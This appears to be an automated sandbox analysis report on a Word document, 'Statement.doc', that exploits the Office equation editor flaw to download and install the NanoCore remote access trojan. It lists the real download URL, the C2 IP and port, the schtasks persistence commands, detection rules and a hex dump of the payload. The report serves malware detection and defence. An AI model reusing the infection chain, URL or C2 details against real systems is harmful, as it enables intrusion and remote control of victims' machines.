Loading ...

Play interactive tourEdit tour

Analysis Report Statement.doc

Overview

General Information

Sample Name:Statement.doc
Analysis ID:345151
MD5:854716b6ff05f02534960443c94340a1
SHA1:6955e99f687a65747a95745b721c43543f3cf389
SHA256:1421f7c867ff97c915fab1236fe5277b3116b426c0102f805fab25ef19fc681c
Tags:doc

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2284 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2424 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • JNM.exe (PID: 1692 cmdline: C:\Users\user\AppData\Roaming\JNM.exe MD5: 10D30AD1922421E73E133AD020DF424F)
      • cmd.exe (PID: 1780 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • timeout.exe (PID: 2336 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
      • JNM.exe (PID: 2304 cmdline: C:\Users\user\AppData\Roaming\JNM.exe MD5: 10D30AD1922421E73E133AD020DF424F)
        • schtasks.exe (PID: 2808 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 2476 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2464 cmdline: taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • JNM.exe (PID: 2360 cmdline: C:\Users\user\AppData\Roaming\JNM.exe 0 MD5: 10D30AD1922421E73E133AD020DF424F)
      • cmd.exe (PID: 1360 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • timeout.exe (PID: 1480 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
      • JNM.exe (PID: 2220 cmdline: C:\Users\user\AppData\Roaming\JNM.exe MD5: 10D30AD1922421E73E133AD020DF424F)
    • smtpsvc.exe (PID: 3012 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 10D30AD1922421E73E133AD020DF424F)
      • cmd.exe (PID: 1836 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • timeout.exe (PID: 1336 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
      • smtpsvc.exe (PID: 1976 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 10D30AD1922421E73E133AD020DF424F)
  • EQNEDT32.EXE (PID: 2176 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["46.243.219.32"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfcf5:$a: NanoCore
    • 0xfd05:$a: NanoCore
    • 0xff39:$a: NanoCore
    • 0xff4d:$a: NanoCore
    • 0xff8d:$a: NanoCore
    • 0xfd54:$b: ClientPlugin
    • 0xff56:$b: ClientPlugin
    • 0xff96:$b: ClientPlugin
    • 0xfe7b:$c: ProjectData
    • 0x10882:$d: DESCrypto
    • 0x1824e:$e: KeepAlive
    • 0x1623c:$g: LogClientMessage
    • 0x12437:$i: get_Connected
    • 0x10bb8:$j: #=q
    • 0x10be8:$j: #=q
    • 0x10c04:$j: #=q
    • 0x10c34:$j: #=q
    • 0x10c50:$j: #=q
    • 0x10c6c:$j: #=q
    • 0x10c9c:$j: #=q
    • 0x10cb8:$j: #=q
    00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 38 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.JNM.exe.620000.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      7.2.JNM.exe.620000.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xe75:$x2: NanoCore.ClientPluginHost
      • 0x1261:$s3: PipeExists
      • 0x1136:$s4: PipeCreated
      • 0xeb0:$s5: IClientLoggingHost
      7.2.JNM.exe.400000.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      7.2.JNM.exe.400000.0.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      7.2.JNM.exe.400000.0.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 15 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\JNM.exe, CommandLine: C:\Users\user\AppData\Roaming\JNM.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\JNM.exe, NewProcessName: C:\Users\user\AppData\Roaming\JNM.exe, OriginalFileName: C:\Users\user\AppData\Roaming\JNM.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2424, ProcessCommandLine: C:\Users\user\AppData\Roaming\JNM.exe, ProcessId: 1692
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 84.38.135.158, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2424, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2424, TargetFilename: C:\Users\user\AppData\Roaming\JNM.exe
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\JNM.exe, ProcessId: 2304, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
        Sigma detected: Scheduled temp file as task from temp locationShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\JNM.exe, ParentImage: C:\Users\user\AppData\Roaming\JNM.exe, ParentProcessId: 2304, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp', ProcessId: 2808

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: JNM.exe.2304.7.memstrMalware Configuration Extractor: NanoCore {"C2: ": ["46.243.219.32"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
        Multi AV Scanner detection for domain / URLShow sources
        Source: manojvashanava234.sytes.netVirustotal: Detection: 10%Perma Link
        Source: http://manojvashanava234.sytes.net/WAH.exeVirustotal: Detection: 9%Perma Link
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeReversingLabs: Detection: 34%
        Source: C:\Users\user\AppData\Roaming\JNM.exeReversingLabs: Detection: 34%
        Multi AV Scanner detection for submitted fileShow sources
        Source: Statement.docVirustotal: Detection: 45%Perma Link
        Source: Statement.docReversingLabs: Detection: 58%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
        Source: Yara matchFile source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Machine Learning detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\JNM.exeJoe Sandbox ML: detected
        Source: 7.2.JNM.exe.630000.3.unpackAvira: Label: TR/NanoCore.fadte

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\JNM.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

        Compliance:

        barindex
        Uses new MSVCR DllsShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Binary contains paths to debug symbolsShow sources
        Source: Binary string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp
        Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32 source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32h source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: MC:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbicddH?X source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
        Source: Binary string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: >vbpC:\Users\user\AppData\Roaming\JNM.PDBBPJQ source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: 8(P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: Qsers\user\AppData\Roaming\JNM.exeVisualBasic.pdb*n source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\AppData\Roaming\JNM.exe77-1006j_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp, JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: QC:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: M.PDBr source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: (P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: ,:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: )vbpC:\Users\user\AppData\Roaming\JNM.PDB.x source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 00000003.00000002.2366184294.0000000006EF0000.00000004.00000001.sdmp
        Source: global trafficDNS query: name: manojvashanava234.sytes.net
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 84.38.135.158:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 84.38.135.158:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorIPs: 46.243.219.32
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 46.243.219.32:2420
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 18:12:25 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1Last-Modified: Wed, 27 Jan 2021 18:12:25 GMTETag: W/"1e1e00-5b9e73c7fac88"Accept-Ranges: bytesContent-Length: 1973760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 e7 39 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 1e 00 00 02 00 00 00 00 00 00 5e 38 1e 00 00 20 00 00 00 40 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 1e 00 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 1e 00 00 20 00 00 00 1a 1e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1e 00 00 02 00 00 00 1c 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 38 1e 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 52 00 00 60 e5 1d 00 03 00 00 00 94 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 95 01 00 06 39 18 00 00 00 fe 09 00 00 72 60 02 1d 70 fe 09 01 00 28 43 00 00 0a 28 44 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 45 00 00 0a 2a fe 09 00 00 2a 2a fe 09 00 00 28 5f 00 00 0a 2a 00 13 30 01 00 5f 08 00 00 00 00 00 00 28 93 01 00 06 28 92 01 00 06 28 91 01 00 06 28 90 01 00 06 28 8f 01 00 06 28 8e 01 00 06 28 8d 01 00 06 28 8c 01 00 06 28 8b 01 00 06 28 8a 01 00 06 28 89 01 00 06 fe 06 01 00 00 0a 80 87 01 00 04 28 88 01 00 06 28 87 01 00 06 28 86 01 00 06 fe 06 02 00 00 0a 80 86 01 00 04 28 85 01 00 06 28 84 01 00 06 28 83 01 00 06 fe 06 03 00 00 0a 80 85 01 00 04 28 82 01 00 06 28 81 01 00 06 28 80 01 00 06 28 7f 01 00 06 28 7e 01 00 06 28 7d 01 00 06 28 7c 01 00 06 28 7b 01 00 06 28 7a 01 00 06 28 79 01 00 06 28 78 01 00 06 28 77 01 00 06 28 76 01 00 06 28 75 01 00 06 28 74 01 00 06 28 73 01 00 06 2
        Source: global trafficHTTP traffic detected: GET /WAH.exe HTTP/1.1Connection: Keep-AliveHost: manojvashanava234.sytes.net
        Source: Joe Sandbox ViewASN Name: DATACLUBLV DATACLUBLV
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55454834-8E09-401E-A760-1A1C7B299BE3}.tmpJump to behavior
        Source: global trafficHTTP traffic detected: GET /WAH.exe HTTP/1.1Connection: Keep-AliveHost: manojvashanava234.sytes.net
        Source: unknownDNS traffic detected: queries for: manojvashanava234.sytes.net
        Source: JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: JNM.exe, 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
        Source: Yara matchFile source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
